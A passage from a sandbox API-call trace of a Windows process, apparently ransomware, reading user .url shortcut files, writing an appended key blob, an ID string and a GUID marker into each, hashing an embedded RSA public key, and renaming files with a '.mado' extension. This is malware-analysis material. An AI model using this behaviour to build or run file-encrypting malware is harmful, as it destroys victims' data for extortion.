0x3b6eb80 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe868 | out: hHeap=0x2c0000) returned 1 [0205.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8b0 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.445] GetCurrentThreadId () returned 0x600 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b691e8 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.445] GetCurrentThreadId () returned 0x600 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8b0 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe868 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe880 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe850 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8c8 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe898 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe8e0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe868 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe868 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8b0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8e0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe868 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72d90 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72fa0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe898 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe8c8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe880 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe850 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe838 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b662b8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72e98 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.449] WriteFile (in: hFile=0x63c, lpBuffer=0x2eee30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x2eee30*, lpNumberOfBytesWritten=0x39cfb14*=0x80, lpOverlapped=0x0) returned 1 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.449] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.449] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.449] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.449] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.449] CloseHandle (hObject=0x63c) returned 1 [0205.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0205.450] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.mado")) returned 1 [0205.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.451] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b3348 | out: hHeap=0x2c0000) returned 1 [0205.452] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0205.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.452] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0205.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.454] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=133) returned 1 [0205.454] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.456] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.456] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.457] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.457] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x85, lpOverlapped=0x0) returned 1 [0205.457] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.457] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.457] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.457] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.458] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.458] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.458] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.458] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.458] GetLastError () returned 0x0 [0205.458] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.458] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.458] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.458] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.459] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.459] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.459] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.459] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.459] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.459] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.459] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.459] CloseHandle (hObject=0x63c) returned 1 [0205.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.460] RtlAllocateHeap 